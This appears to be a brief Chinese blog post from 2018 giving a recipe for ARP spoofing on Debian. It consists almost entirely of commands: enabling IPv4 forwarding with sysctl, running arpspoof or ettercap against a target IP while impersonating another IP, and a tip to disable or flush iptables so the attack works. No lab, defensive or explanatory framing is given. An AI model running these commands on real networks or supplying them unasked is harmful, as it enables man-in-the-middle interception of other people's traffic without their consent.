debian下arp欺骗

sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -p

arpspoof -i eth0 -t 目标ip -r 伪装ip
或者
ettercap -i eth0 -Tq -M arp:remote //目标ip// //伪装ip// 注意,一定要关闭iptables,或者清空规则,坑爹的

 

posted @ 2018-03-29 17:32  自由出土文物  阅读(237)  评论(0编辑  收藏  举报